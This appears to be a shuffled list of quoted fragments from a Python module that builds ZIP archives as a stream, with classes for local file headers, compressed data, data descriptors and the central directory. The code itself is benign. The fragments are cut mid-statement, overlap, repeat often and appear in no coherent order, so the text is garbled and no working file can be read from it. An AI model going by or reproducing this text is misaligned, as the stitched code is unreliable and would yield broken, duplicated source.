"2) extra_data = self.zinfo.extra filename, flag_bits = self.zinfo._encodeFilenameFlags() centdir = struct.pack( zipfile.structCentralDir, zipfile.stringCentralDir,",
"file's header, for inclusion in the archive's central directory \"\"\" dt = self.zinfo.date_time",
"file.zinfo.header_offset = cumulative_offset file_headers.append(file.directory_header) cumulative_offset += file.total_bytes file_headers = b''.join(file_headers) count = len(self.files)",
"class ZipLocalFileData(BaseStream): \"\"\"A thin stream wrapper, used to update a ZipLocalFile as chunks",
"self.zinfo.CRC, self.compressed_size, self.original_size, ) @property def total_bytes(self): \"\"\"Length, in bytes, of output. Includes",
"= [ZipLocalFile(each) for each in streams] # Append a stream for the archive's",
"a single, Zip-compressed stream\"\"\" def __init__(self, *streams): # Each incoming stream should be",
"updated as file is streamed self.zinfo.CRC = 0 # define a compressor self.compressor",
"size(self): return 0 @asyncio.coroutine def _read(self, n=-1): file_headers = [] cumulative_offset = 0",
"*args, **kwargs) # Update file info self.file.original_size += len(chunk) self.file.zinfo.CRC = binascii.crc32(chunk, self.file.zinfo.CRC)",
"= self.zinfo.extra filename, flag_bits = self.zinfo._encodeFilenameFlags() centdir = struct.pack( zipfile.structCentralDir, zipfile.stringCentralDir, self.zinfo.create_version, self.zinfo.create_system,",
"file): super().__init__() self.file = file @property def size(self): return 0 @asyncio.coroutine def _read(self,",
"= ret[n:] ret = ret[:n] else: self._buffer = bytearray() # EOF is the",
"zipfile.structCentralDir, zipfile.stringCentralDir, self.zinfo.create_version, self.zinfo.create_system, self.zinfo.extract_version, self.zinfo.reserved, flag_bits, self.zinfo.compress_type, dostime, # modification time dosdate,",
"= b'PK\\x07\\x08' # magic number for data descriptor return struct.pack( fmt, signature, self.zinfo.CRC,",
"self.stream.at_eof(): chunk = yield from self.stream.read(n, *args, **kwargs) # Update file info self.file.original_size",
"instance streams = [ZipLocalFile(each) for each in streams] # Append a stream for",
"of output. Includes header and footer Note: This should be access after the",
"total_bytes(self): \"\"\"Length, in bytes, of output. Includes header and footer Note: This should",
"<< 5 | dt[2] dostime = dt[3] << 11 | dt[4] << 5",
"@property def local_header(self): \"\"\"The file's header, for inclusion just before the content stream\"\"\"",
"__init__(self, file_tuple): filename, stream = file_tuple filename = filename.strip('/') # Build a ZipInfo",
"= dt[3] << 11 | dt[4] << 5 | (dt[5] // 2) extra_data",
"def __init__(self, *streams): # Each incoming stream should be wrapped in a _ZipFile",
"coupled to ZipStreamReader, and should not be used separately \"\"\" def __init__(self, file_tuple):",
"bytearray() # EOF is the buffer and stream are both empty if not",
"centdir = struct.pack( zipfile.structCentralDir, zipfile.stringCentralDir, self.zinfo.create_version, self.zinfo.create_system, self.zinfo.extract_version, self.zinfo.reserved, flag_bits, self.zinfo.compress_type, dostime, #",
"(self.stream()) ret = self._buffer while (n == -1 or len(ret) < n) and",
"instance to use for the file's header and footer self.zinfo = zipfile.ZipInfo( filename=filename,",
"= [] cumulative_offset = 0 for file in self.files: file.zinfo.header_offset = cumulative_offset file_headers.append(file.directory_header)",
"== -1 or len(ret) < n) and not self.stream.at_eof(): chunk = yield from",
"= file_tuple filename = filename.strip('/') # Build a ZipInfo instance to use for",
"cumulative_offset, 0, ) self.feed_eof() return b''.join((file_headers, endrec)) class ZipStreamReader(MultiStream): \"\"\"Combines one or more",
"= bytearray() # EOF is the buffer and stream are both empty if",
"0 # define a compressor self.compressor = zlib.compressobj( zlib.Z_DEFAULT_COMPRESSION, zlib.DEFLATED, -15, ) #",
"as file is streamed self.zinfo.CRC = 0 # define a compressor self.compressor =",
"5 | dt[2] dostime = dt[3] << 11 | dt[4] << 5 |",
"is the buffer and stream are both empty if not self._buffer and self.stream.at_eof():",
"\"\"\"A local file in a zip archive Note: This class is tightly coupled",
"return self.file.descriptor class ZipLocalFileData(BaseStream): \"\"\"A thin stream wrapper, used to update a ZipLocalFile",
"to ZipStreamReader, and should not be used separately \"\"\" def __init__(self, files, *args,",
"streams] # Append a stream for the archive's footer (central directory) streams.append(ZipArchiveCentralDirectory(streams.copy())) super().__init__(*streams)",
"both empty if not self._buffer and self.stream.at_eof(): self.feed_eof() return bytes(ret) class ZipLocalFile(MultiStream): \"\"\"A",
"self.file = file @property def size(self): return 0 @asyncio.coroutine def _read(self, *args, **kwargs):",
"\"\"\"Length, in bytes, of output. Includes header and footer Note: This should be",
"@asyncio.coroutine def _read(self, n=-1, *args, **kwargs): if callable(self.stream): self.stream = yield from (self.stream())",
"cumulative_offset file_headers.append(file.directory_header) cumulative_offset += file.total_bytes file_headers = b''.join(file_headers) count = len(self.files) endrec =",
"struct.pack( zipfile.structEndArchive, zipfile.stringEndArchive, 0, 0, count, count, len(file_headers), cumulative_offset, 0, ) self.feed_eof() return",
"files, *args, **kwargs): super().__init__() self.files = files @property def size(self): return 0 @asyncio.coroutine",
"0 @asyncio.coroutine def _read(self, n=-1, *args, **kwargs): if callable(self.stream): self.stream = yield from",
"one or more streams into a single, Zip-compressed stream\"\"\" def __init__(self, *streams): #",
"= 0 self.compressed_size = 0 super().__init__( StringStream(self.local_header), ZipLocalFileData(self, stream), ZipLocalFileDescriptor(self), ) @property def",
"= self.zinfo.date_time # modification date/time, in MSDOS format dosdate = (dt[0] - 1980)",
"is streamed self.zinfo.CRC = 0 # define a compressor self.compressor = zlib.compressobj( zlib.Z_DEFAULT_COMPRESSION,",
"@asyncio.coroutine def _read(self, n=-1): file_headers = [] cumulative_offset = 0 for file in",
"len(self.descriptor) ) class ZipArchiveCentralDirectory(BaseStream): \"\"\"The central directory for a zip archive Note: This",
"ZipLocalFileData(self, stream), ZipLocalFileDescriptor(self), ) @property def local_header(self): \"\"\"The file's header, for inclusion just",
"flag_bits = self.zinfo._encodeFilenameFlags() centdir = struct.pack( zipfile.structCentralDir, zipfile.stringCentralDir, self.zinfo.create_version, self.zinfo.create_system, self.zinfo.extract_version, self.zinfo.reserved, flag_bits,",
"= 0 # define a compressor self.compressor = zlib.compressobj( zlib.Z_DEFAULT_COMPRESSION, zlib.DEFLATED, -15, )",
") # meta information - needed to build the footer self.original_size = 0",
"footer self.original_size = 0 self.compressed_size = 0 super().__init__( StringStream(self.local_header), ZipLocalFileData(self, stream), ZipLocalFileDescriptor(self), )",
"return 0 @asyncio.coroutine def _read(self, n=-1, *args, **kwargs): if callable(self.stream): self.stream = yield",
"to ZipStreamReader, and should not be used separately \"\"\" def __init__(self, file_tuple): filename,",
"from waterbutler.core.streams import BaseStream from waterbutler.core.streams import MultiStream from waterbutler.core.streams import StringStream class",
"class is tightly coupled to ZipStreamReader, and should not be used separately \"\"\"",
"**kwargs) @property def size(self): return 0 @asyncio.coroutine def _read(self, n=-1, *args, **kwargs): if",
"from self.stream.read(n, *args, **kwargs) # Update file info self.file.original_size += len(chunk) self.file.zinfo.CRC =",
"True return self.file.descriptor class ZipLocalFileData(BaseStream): \"\"\"A thin stream wrapper, used to update a",
"+= len(chunk) self.file.zinfo.CRC = binascii.crc32(chunk, self.file.zinfo.CRC) # compress compressed = self.file.compressor.compress(chunk) compressed +=",
"return bytes(ret) class ZipLocalFile(MultiStream): \"\"\"A local file in a zip archive Note: This",
"and not self.stream.at_eof(): chunk = yield from self.stream.read(n, *args, **kwargs) # Update file",
"not be used separately \"\"\" def __init__(self, files, *args, **kwargs): super().__init__() self.files =",
"count, len(file_headers), cumulative_offset, 0, ) self.feed_eof() return b''.join((file_headers, endrec)) class ZipStreamReader(MultiStream): \"\"\"Combines one",
"ZipStreamReader, and should not be used separately \"\"\" def __init__(self, file): super().__init__() self.file",
"# Each incoming stream should be wrapped in a _ZipFile instance streams =",
"file info self.file.compressed_size += len(compressed) ret += compressed # buffer any overages if",
"_ZipFile instance streams = [ZipLocalFile(each) for each in streams] # Append a stream",
"dt = self.zinfo.date_time # modification date/time, in MSDOS format dosdate = (dt[0] -",
"import zipfile import zlib from waterbutler.core.streams import BaseStream from waterbutler.core.streams import MultiStream from",
"in streams] # Append a stream for the archive's footer (central directory) streams.append(ZipArchiveCentralDirectory(streams.copy()))",
"if callable(self.stream): self.stream = yield from (self.stream()) ret = self._buffer while (n ==",
"else: self._buffer = bytearray() # EOF is the buffer and stream are both",
"in bytes, of output. Includes header and footer Note: This should be access",
"def __init__(self, files, *args, **kwargs): super().__init__() self.files = files @property def size(self): return",
"waterbutler.core.streams import StringStream class ZipLocalFileDescriptor(BaseStream): \"\"\"The descriptor (footer) for a local file in",
"Includes header and footer Note: This should be access after the file's data",
"> n: self._buffer = ret[n:] ret = ret[:n] else: self._buffer = bytearray() #",
"len(file_headers), cumulative_offset, 0, ) self.feed_eof() return b''.join((file_headers, endrec)) class ZipStreamReader(MultiStream): \"\"\"Combines one or",
"file CRC, file size, and compress size\"\"\" self._eof = True return self.file.descriptor class",
"self.files = files @property def size(self): return 0 @asyncio.coroutine def _read(self, n=-1): file_headers",
"CRC, file size, and compress size\"\"\" self._eof = True return self.file.descriptor class ZipLocalFileData(BaseStream):",
"self.feed_eof() return bytes(ret) class ZipLocalFile(MultiStream): \"\"\"A local file in a zip archive Note:",
"return centdir + filename + extra_data + self.zinfo.comment @property def descriptor(self): \"\"\"Local file",
"len(self.zinfo.comment), 0, self.zinfo.internal_attr, self.zinfo.external_attr, self.zinfo.header_offset, ) return centdir + filename + extra_data +",
"file's header and footer self.zinfo = zipfile.ZipInfo( filename=filename, date_time=time.localtime(time.time())[:6], ) self.zinfo.compress_type = zipfile.ZIP_DEFLATED",
"and should not be used separately \"\"\" def __init__(self, file_tuple): filename, stream =",
"self.zinfo.external_attr, self.zinfo.header_offset, ) return centdir + filename + extra_data + self.zinfo.comment @property def",
"self.zinfo = zipfile.ZipInfo( filename=filename, date_time=time.localtime(time.time())[:6], ) self.zinfo.compress_type = zipfile.ZIP_DEFLATED self.zinfo.external_attr = 0o600 <<",
"(n == -1 or len(ret) < n) and not self.stream.at_eof(): chunk = yield",
"descriptor\"\"\" fmt = '<4sLLL' signature = b'PK\\x07\\x08' # magic number for data descriptor",
"self.zinfo.compress_type = zipfile.ZIP_DEFLATED self.zinfo.external_attr = 0o600 << 16 self.zinfo.header_offset = 0 self.zinfo.flag_bits |=",
"of file CRC, file size, and compress size\"\"\" self._eof = True return self.file.descriptor",
"**kwargs) # Update file info self.file.original_size += len(chunk) self.file.zinfo.CRC = binascii.crc32(chunk, self.file.zinfo.CRC) #",
"file in self.files: file.zinfo.header_offset = cumulative_offset file_headers.append(file.directory_header) cumulative_offset += file.total_bytes file_headers = b''.join(file_headers)",
"before the content stream\"\"\" return self.zinfo.FileHeader(zip64=False) @property def directory_header(self): \"\"\"The file's header, for",
"( len(self.local_header) + self.compressed_size + len(self.descriptor) ) class ZipArchiveCentralDirectory(BaseStream): \"\"\"The central directory for",
"self.file = file self.stream = stream self._buffer = bytearray() super().__init__(*args, **kwargs) @property def",
"zipfile.structEndArchive, zipfile.stringEndArchive, 0, 0, count, count, len(file_headers), cumulative_offset, 0, ) self.feed_eof() return b''.join((file_headers,",
"file, stream, *args, **kwargs): self.file = file self.stream = stream self._buffer = bytearray()",
"inclusion just before the content stream\"\"\" return self.zinfo.FileHeader(zip64=False) @property def directory_header(self): \"\"\"The file's",
"import MultiStream from waterbutler.core.streams import StringStream class ZipLocalFileDescriptor(BaseStream): \"\"\"The descriptor (footer) for a",
"stream should be wrapped in a _ZipFile instance streams = [ZipLocalFile(each) for each",
"signature, self.zinfo.CRC, self.compressed_size, self.original_size, ) @property def total_bytes(self): \"\"\"Length, in bytes, of output.",
"file is streamed self.zinfo.CRC = 0 # define a compressor self.compressor = zlib.compressobj(",
"__init__(self, file): super().__init__() self.file = file @property def size(self): return 0 @asyncio.coroutine def",
"as chunks are read Note: This class is tightly coupled to ZipStreamReader, and",
"= file self.stream = stream self._buffer = bytearray() super().__init__(*args, **kwargs) @property def size(self):",
"self.zinfo.create_version, self.zinfo.create_system, self.zinfo.extract_version, self.zinfo.reserved, flag_bits, self.zinfo.compress_type, dostime, # modification time dosdate, self.zinfo.CRC, self.compressed_size,",
"super().__init__(*args, **kwargs) @property def size(self): return 0 @asyncio.coroutine def _read(self, n=-1, *args, **kwargs):",
"def __init__(self, file_tuple): filename, stream = file_tuple filename = filename.strip('/') # Build a",
"stream self._buffer = bytearray() super().__init__(*args, **kwargs) @property def size(self): return 0 @asyncio.coroutine def",
"\"\"\" def __init__(self, files, *args, **kwargs): super().__init__() self.files = files @property def size(self):",
"<< 5 | (dt[5] // 2) extra_data = self.zinfo.extra filename, flag_bits = self.zinfo._encodeFilenameFlags()",
"ZipLocalFileDescriptor(self), ) @property def local_header(self): \"\"\"The file's header, for inclusion just before the",
"info self.file.compressed_size += len(compressed) ret += compressed # buffer any overages if n",
"self.compressor = zlib.compressobj( zlib.Z_DEFAULT_COMPRESSION, zlib.DEFLATED, -15, ) # meta information - needed to",
"class ZipStreamReader(MultiStream): \"\"\"Combines one or more streams into a single, Zip-compressed stream\"\"\" def",
"be access after the file's data has been streamed. \"\"\" return ( len(self.local_header)",
"MSDOS format dosdate = (dt[0] - 1980) << 9 | dt[1] << 5",
"the file's data has been streamed. \"\"\" return ( len(self.local_header) + self.compressed_size +",
"len(extra_data), len(self.zinfo.comment), 0, self.zinfo.internal_attr, self.zinfo.external_attr, self.zinfo.header_offset, ) return centdir + filename + extra_data",
"Zip-compressed stream\"\"\" def __init__(self, *streams): # Each incoming stream should be wrapped in",
"@property def size(self): return 0 @asyncio.coroutine def _read(self, n=-1, *args, **kwargs): if callable(self.stream):",
"cumulative_offset = 0 for file in self.files: file.zinfo.header_offset = cumulative_offset file_headers.append(file.directory_header) cumulative_offset +=",
"dt[4] << 5 | (dt[5] // 2) extra_data = self.zinfo.extra filename, flag_bits =",
"more streams into a single, Zip-compressed stream\"\"\" def __init__(self, *streams): # Each incoming",
") class ZipArchiveCentralDirectory(BaseStream): \"\"\"The central directory for a zip archive Note: This class",
"= bytearray() super().__init__(*args, **kwargs) @property def size(self): return 0 @asyncio.coroutine def _read(self, n=-1,",
"# compress compressed = self.file.compressor.compress(chunk) compressed += self.file.compressor.flush( zlib.Z_FINISH if self.stream.at_eof() else zlib.Z_SYNC_FLUSH",
"incoming stream should be wrapped in a _ZipFile instance streams = [ZipLocalFile(each) for",
"import asyncio import binascii import struct import time import zipfile import zlib from",
"self.zinfo.flag_bits |= 0x08 # Initial CRC: value will be updated as file is",
"import struct import time import zipfile import zlib from waterbutler.core.streams import BaseStream from",
"# magic number for data descriptor return struct.pack( fmt, signature, self.zinfo.CRC, self.compressed_size, self.original_size,",
"in the archive's central directory \"\"\" dt = self.zinfo.date_time # modification date/time, in",
"def __init__(self, file, stream, *args, **kwargs): self.file = file self.stream = stream self._buffer",
"used separately \"\"\" def __init__(self, file): super().__init__() self.file = file @property def size(self):",
"Each incoming stream should be wrapped in a _ZipFile instance streams = [ZipLocalFile(each)",
"n: self._buffer = ret[n:] ret = ret[:n] else: self._buffer = bytearray() # EOF",
"n) and not self.stream.at_eof(): chunk = yield from self.stream.read(n, *args, **kwargs) # Update",
"CRC: value will be updated as file is streamed self.zinfo.CRC = 0 #",
"len(ret) > n: self._buffer = ret[n:] ret = ret[:n] else: self._buffer = bytearray()",
"modification time dosdate, self.zinfo.CRC, self.compressed_size, self.original_size, len(self.zinfo.filename.encode('utf-8')), len(extra_data), len(self.zinfo.comment), 0, self.zinfo.internal_attr, self.zinfo.external_attr, self.zinfo.header_offset,",
"and len(ret) > n: self._buffer = ret[n:] ret = ret[:n] else: self._buffer =",
"len(ret) < n) and not self.stream.at_eof(): chunk = yield from self.stream.read(n, *args, **kwargs)",
"= zlib.compressobj( zlib.Z_DEFAULT_COMPRESSION, zlib.DEFLATED, -15, ) # meta information - needed to build",
"tightly coupled to ZipStreamReader, and should not be used separately \"\"\" def __init__(self,",
"each in streams] # Append a stream for the archive's footer (central directory)",
"should be wrapped in a _ZipFile instance streams = [ZipLocalFile(each) for each in",
"to ZipStreamReader, and should not be used separately \"\"\" def __init__(self, file, stream,",
"self.stream = yield from (self.stream()) ret = self._buffer while (n == -1 or",
"or more streams into a single, Zip-compressed stream\"\"\" def __init__(self, *streams): # Each",
"used separately \"\"\" def __init__(self, file_tuple): filename, stream = file_tuple filename = filename.strip('/')",
"ZipStreamReader(MultiStream): \"\"\"Combines one or more streams into a single, Zip-compressed stream\"\"\" def __init__(self,",
"not self.stream.at_eof(): chunk = yield from self.stream.read(n, *args, **kwargs) # Update file info",
"cumulative_offset += file.total_bytes file_headers = b''.join(file_headers) count = len(self.files) endrec = struct.pack( zipfile.structEndArchive,",
"wrapper, used to update a ZipLocalFile as chunks are read Note: This class",
"the file's header and footer self.zinfo = zipfile.ZipInfo( filename=filename, date_time=time.localtime(time.time())[:6], ) self.zinfo.compress_type =",
") @property def total_bytes(self): \"\"\"Length, in bytes, of output. Includes header and footer",
"to use for the file's header and footer self.zinfo = zipfile.ZipInfo( filename=filename, date_time=time.localtime(time.time())[:6],",
"build the footer self.original_size = 0 self.compressed_size = 0 super().__init__( StringStream(self.local_header), ZipLocalFileData(self, stream),",
"*args, **kwargs): self.file = file self.stream = stream self._buffer = bytearray() super().__init__(*args, **kwargs)",
"self._buffer while (n == -1 or len(ret) < n) and not self.stream.at_eof(): chunk",
"if not self._buffer and self.stream.at_eof(): self.feed_eof() return bytes(ret) class ZipLocalFile(MultiStream): \"\"\"A local file",
"\"\"\"Local file data descriptor\"\"\" fmt = '<4sLLL' signature = b'PK\\x07\\x08' # magic number",
"16 self.zinfo.header_offset = 0 self.zinfo.flag_bits |= 0x08 # Initial CRC: value will be",
"len(self.local_header) + self.compressed_size + len(self.descriptor) ) class ZipArchiveCentralDirectory(BaseStream): \"\"\"The central directory for a",
"wrapped in a _ZipFile instance streams = [ZipLocalFile(each) for each in streams] #",
"stream), ZipLocalFileDescriptor(self), ) @property def local_header(self): \"\"\"The file's header, for inclusion just before",
"# define a compressor self.compressor = zlib.compressobj( zlib.Z_DEFAULT_COMPRESSION, zlib.DEFLATED, -15, ) # meta",
"0 @asyncio.coroutine def _read(self, *args, **kwargs): \"\"\"Create 16 byte descriptor of file CRC,",
"yield from self.stream.read(n, *args, **kwargs) # Update file info self.file.original_size += len(chunk) self.file.zinfo.CRC",
"\"\"\"The central directory for a zip archive Note: This class is tightly coupled",
"header, for inclusion in the archive's central directory \"\"\" dt = self.zinfo.date_time #",
"-15, ) # meta information - needed to build the footer self.original_size =",
"header and footer Note: This should be access after the file's data has",
"to build the footer self.original_size = 0 self.compressed_size = 0 super().__init__( StringStream(self.local_header), ZipLocalFileData(self,",
"16 byte descriptor of file CRC, file size, and compress size\"\"\" self._eof =",
"signature = b'PK\\x07\\x08' # magic number for data descriptor return struct.pack( fmt, signature,",
"fmt = '<4sLLL' signature = b'PK\\x07\\x08' # magic number for data descriptor return",
"file in a zip archive Note: This class is tightly coupled to ZipStreamReader,",
"# Initial CRC: value will be updated as file is streamed self.zinfo.CRC =",
"\"\"\" def __init__(self, file): super().__init__() self.file = file @property def size(self): return 0",
"ZipArchiveCentralDirectory(BaseStream): \"\"\"The central directory for a zip archive Note: This class is tightly",
"the buffer and stream are both empty if not self._buffer and self.stream.at_eof(): self.feed_eof()",
"def local_header(self): \"\"\"The file's header, for inclusion just before the content stream\"\"\" return",
"- 1980) << 9 | dt[1] << 5 | dt[2] dostime = dt[3]",
"access after the file's data has been streamed. \"\"\" return ( len(self.local_header) +",
"# meta information - needed to build the footer self.original_size = 0 self.compressed_size",
"= cumulative_offset file_headers.append(file.directory_header) cumulative_offset += file.total_bytes file_headers = b''.join(file_headers) count = len(self.files) endrec",
"a zip archive Note: This class is tightly coupled to ZipStreamReader, and should",
"in MSDOS format dosdate = (dt[0] - 1980) << 9 | dt[1] <<",
"not self._buffer and self.stream.at_eof(): self.feed_eof() return bytes(ret) class ZipLocalFile(MultiStream): \"\"\"A local file in",
"= struct.pack( zipfile.structCentralDir, zipfile.stringCentralDir, self.zinfo.create_version, self.zinfo.create_system, self.zinfo.extract_version, self.zinfo.reserved, flag_bits, self.zinfo.compress_type, dostime, # modification",
"for the file's header and footer self.zinfo = zipfile.ZipInfo( filename=filename, date_time=time.localtime(time.time())[:6], ) self.zinfo.compress_type",
"self.compressed_size, self.original_size, ) @property def total_bytes(self): \"\"\"Length, in bytes, of output. Includes header",
"return 0 @asyncio.coroutine def _read(self, *args, **kwargs): \"\"\"Create 16 byte descriptor of file",
"zlib.compressobj( zlib.Z_DEFAULT_COMPRESSION, zlib.DEFLATED, -15, ) # meta information - needed to build the",
"file_headers = b''.join(file_headers) count = len(self.files) endrec = struct.pack( zipfile.structEndArchive, zipfile.stringEndArchive, 0, 0,",
"self.file.zinfo.CRC = binascii.crc32(chunk, self.file.zinfo.CRC) # compress compressed = self.file.compressor.compress(chunk) compressed += self.file.compressor.flush( zlib.Z_FINISH",
"header and footer self.zinfo = zipfile.ZipInfo( filename=filename, date_time=time.localtime(time.time())[:6], ) self.zinfo.compress_type = zipfile.ZIP_DEFLATED self.zinfo.external_attr",
"0, self.zinfo.internal_attr, self.zinfo.external_attr, self.zinfo.header_offset, ) return centdir + filename + extra_data + self.zinfo.comment",
"<< 9 | dt[1] << 5 | dt[2] dostime = dt[3] << 11",
"chunk = yield from self.stream.read(n, *args, **kwargs) # Update file info self.file.original_size +=",
"archive Note: This class is tightly coupled to ZipStreamReader, and should not be",
"file.total_bytes file_headers = b''.join(file_headers) count = len(self.files) endrec = struct.pack( zipfile.structEndArchive, zipfile.stringEndArchive, 0,",
"overages if n != -1 and len(ret) > n: self._buffer = ret[n:] ret",
"def directory_header(self): \"\"\"The file's header, for inclusion in the archive's central directory \"\"\"",
"def size(self): return 0 @asyncio.coroutine def _read(self, n=-1, *args, **kwargs): if callable(self.stream): self.stream",
"import binascii import struct import time import zipfile import zlib from waterbutler.core.streams import",
"def total_bytes(self): \"\"\"Length, in bytes, of output. Includes header and footer Note: This",
"to update a ZipLocalFile as chunks are read Note: This class is tightly",
"in a zip archive Note: This class is tightly coupled to ZipStreamReader, and",
"compress compressed = self.file.compressor.compress(chunk) compressed += self.file.compressor.flush( zlib.Z_FINISH if self.stream.at_eof() else zlib.Z_SYNC_FLUSH )",
"super().__init__() self.file = file @property def size(self): return 0 @asyncio.coroutine def _read(self, *args,",
"should not be used separately \"\"\" def __init__(self, file, stream, *args, **kwargs): self.file",
"descriptor return struct.pack( fmt, signature, self.zinfo.CRC, self.compressed_size, self.original_size, ) @property def total_bytes(self): \"\"\"Length,",
"a local file in a zip archive Note: This class is tightly coupled",
"\"\"\"Combines one or more streams into a single, Zip-compressed stream\"\"\" def __init__(self, *streams):",
"the footer self.original_size = 0 self.compressed_size = 0 super().__init__( StringStream(self.local_header), ZipLocalFileData(self, stream), ZipLocalFileDescriptor(self),",
"ret = ret[:n] else: self._buffer = bytearray() # EOF is the buffer and",
"count = len(self.files) endrec = struct.pack( zipfile.structEndArchive, zipfile.stringEndArchive, 0, 0, count, count, len(file_headers),",
") return centdir + filename + extra_data + self.zinfo.comment @property def descriptor(self): \"\"\"Local",
"compressed = self.file.compressor.compress(chunk) compressed += self.file.compressor.flush( zlib.Z_FINISH if self.stream.at_eof() else zlib.Z_SYNC_FLUSH ) #",
"to ZipStreamReader, and should not be used separately \"\"\" def __init__(self, file): super().__init__()",
"@property def size(self): return 0 @asyncio.coroutine def _read(self, *args, **kwargs): \"\"\"Create 16 byte",
"_read(self, *args, **kwargs): \"\"\"Create 16 byte descriptor of file CRC, file size, and",
"in self.files: file.zinfo.header_offset = cumulative_offset file_headers.append(file.directory_header) cumulative_offset += file.total_bytes file_headers = b''.join(file_headers) count",
"inclusion in the archive's central directory \"\"\" dt = self.zinfo.date_time # modification date/time,",
"self.file.zinfo.CRC) # compress compressed = self.file.compressor.compress(chunk) compressed += self.file.compressor.flush( zlib.Z_FINISH if self.stream.at_eof() else",
"*args, **kwargs): \"\"\"Create 16 byte descriptor of file CRC, file size, and compress",
"not be used separately \"\"\" def __init__(self, file_tuple): filename, stream = file_tuple filename",
"\"\"\"The descriptor (footer) for a local file in a zip archive Note: This",
"separately \"\"\" def __init__(self, file): super().__init__() self.file = file @property def size(self): return",
"0, count, count, len(file_headers), cumulative_offset, 0, ) self.feed_eof() return b''.join((file_headers, endrec)) class ZipStreamReader(MultiStream):",
"self.zinfo.extract_version, self.zinfo.reserved, flag_bits, self.zinfo.compress_type, dostime, # modification time dosdate, self.zinfo.CRC, self.compressed_size, self.original_size, len(self.zinfo.filename.encode('utf-8')),",
"filename.strip('/') # Build a ZipInfo instance to use for the file's header and",
"+ extra_data + self.zinfo.comment @property def descriptor(self): \"\"\"Local file data descriptor\"\"\" fmt =",
"info self.file.original_size += len(chunk) self.file.zinfo.CRC = binascii.crc32(chunk, self.file.zinfo.CRC) # compress compressed = self.file.compressor.compress(chunk)",
"file_tuple filename = filename.strip('/') # Build a ZipInfo instance to use for the",
"local_header(self): \"\"\"The file's header, for inclusion just before the content stream\"\"\" return self.zinfo.FileHeader(zip64=False)",
"for file in self.files: file.zinfo.header_offset = cumulative_offset file_headers.append(file.directory_header) cumulative_offset += file.total_bytes file_headers =",
"class ZipLocalFileDescriptor(BaseStream): \"\"\"The descriptor (footer) for a local file in a zip archive",
"centdir + filename + extra_data + self.zinfo.comment @property def descriptor(self): \"\"\"Local file data",
"# buffer any overages if n != -1 and len(ret) > n: self._buffer",
"size(self): return 0 @asyncio.coroutine def _read(self, *args, **kwargs): \"\"\"Create 16 byte descriptor of",
"used to update a ZipLocalFile as chunks are read Note: This class is",
"= len(self.files) endrec = struct.pack( zipfile.structEndArchive, zipfile.stringEndArchive, 0, 0, count, count, len(file_headers), cumulative_offset,",
"ZipLocalFileData(BaseStream): \"\"\"A thin stream wrapper, used to update a ZipLocalFile as chunks are",
"for inclusion just before the content stream\"\"\" return self.zinfo.FileHeader(zip64=False) @property def directory_header(self): \"\"\"The",
"self.zinfo.date_time # modification date/time, in MSDOS format dosdate = (dt[0] - 1980) <<",
"b'PK\\x07\\x08' # magic number for data descriptor return struct.pack( fmt, signature, self.zinfo.CRC, self.compressed_size,",
"self.zinfo.create_system, self.zinfo.extract_version, self.zinfo.reserved, flag_bits, self.zinfo.compress_type, dostime, # modification time dosdate, self.zinfo.CRC, self.compressed_size, self.original_size,",
"for a local file in a zip archive Note: This class is tightly",
"self.stream.read(n, *args, **kwargs) # Update file info self.file.original_size += len(chunk) self.file.zinfo.CRC = binascii.crc32(chunk,",
"and should not be used separately \"\"\" def __init__(self, file): super().__init__() self.file =",
"+ self.compressed_size + len(self.descriptor) ) class ZipArchiveCentralDirectory(BaseStream): \"\"\"The central directory for a zip",
"[] cumulative_offset = 0 for file in self.files: file.zinfo.header_offset = cumulative_offset file_headers.append(file.directory_header) cumulative_offset",
"self.stream = stream self._buffer = bytearray() super().__init__(*args, **kwargs) @property def size(self): return 0",
"self.compressed_size = 0 super().__init__( StringStream(self.local_header), ZipLocalFileData(self, stream), ZipLocalFileDescriptor(self), ) @property def local_header(self): \"\"\"The",
"file @property def size(self): return 0 @asyncio.coroutine def _read(self, *args, **kwargs): \"\"\"Create 16",
"return self.zinfo.FileHeader(zip64=False) @property def directory_header(self): \"\"\"The file's header, for inclusion in the archive's",
"self.zinfo.comment @property def descriptor(self): \"\"\"Local file data descriptor\"\"\" fmt = '<4sLLL' signature =",
"ZipStreamReader, and should not be used separately \"\"\" def __init__(self, files, *args, **kwargs):",
"struct.pack( fmt, signature, self.zinfo.CRC, self.compressed_size, self.original_size, ) @property def total_bytes(self): \"\"\"Length, in bytes,",
"empty if not self._buffer and self.stream.at_eof(): self.feed_eof() return bytes(ret) class ZipLocalFile(MultiStream): \"\"\"A local",
"self.zinfo.internal_attr, self.zinfo.external_attr, self.zinfo.header_offset, ) return centdir + filename + extra_data + self.zinfo.comment @property",
") self.feed_eof() return b''.join((file_headers, endrec)) class ZipStreamReader(MultiStream): \"\"\"Combines one or more streams into",
"be used separately \"\"\" def __init__(self, file, stream, *args, **kwargs): self.file = file",
"for each in streams] # Append a stream for the archive's footer (central",
"and compress size\"\"\" self._eof = True return self.file.descriptor class ZipLocalFileData(BaseStream): \"\"\"A thin stream",
"callable(self.stream): self.stream = yield from (self.stream()) ret = self._buffer while (n == -1",
"+= file.total_bytes file_headers = b''.join(file_headers) count = len(self.files) endrec = struct.pack( zipfile.structEndArchive, zipfile.stringEndArchive,",
"_read(self, n=-1): file_headers = [] cumulative_offset = 0 for file in self.files: file.zinfo.header_offset",
"zipfile.stringEndArchive, 0, 0, count, count, len(file_headers), cumulative_offset, 0, ) self.feed_eof() return b''.join((file_headers, endrec))",
"data descriptor return struct.pack( fmt, signature, self.zinfo.CRC, self.compressed_size, self.original_size, ) @property def total_bytes(self):",
"ZipLocalFileDescriptor(BaseStream): \"\"\"The descriptor (footer) for a local file in a zip archive Note:",
"self.zinfo._encodeFilenameFlags() centdir = struct.pack( zipfile.structCentralDir, zipfile.stringCentralDir, self.zinfo.create_version, self.zinfo.create_system, self.zinfo.extract_version, self.zinfo.reserved, flag_bits, self.zinfo.compress_type, dostime,",
"len(self.zinfo.filename.encode('utf-8')), len(extra_data), len(self.zinfo.comment), 0, self.zinfo.internal_attr, self.zinfo.external_attr, self.zinfo.header_offset, ) return centdir + filename +",
"footer self.zinfo = zipfile.ZipInfo( filename=filename, date_time=time.localtime(time.time())[:6], ) self.zinfo.compress_type = zipfile.ZIP_DEFLATED self.zinfo.external_attr = 0o600",
"// 2) extra_data = self.zinfo.extra filename, flag_bits = self.zinfo._encodeFilenameFlags() centdir = struct.pack( zipfile.structCentralDir,",
"file_headers.append(file.directory_header) cumulative_offset += file.total_bytes file_headers = b''.join(file_headers) count = len(self.files) endrec = struct.pack(",
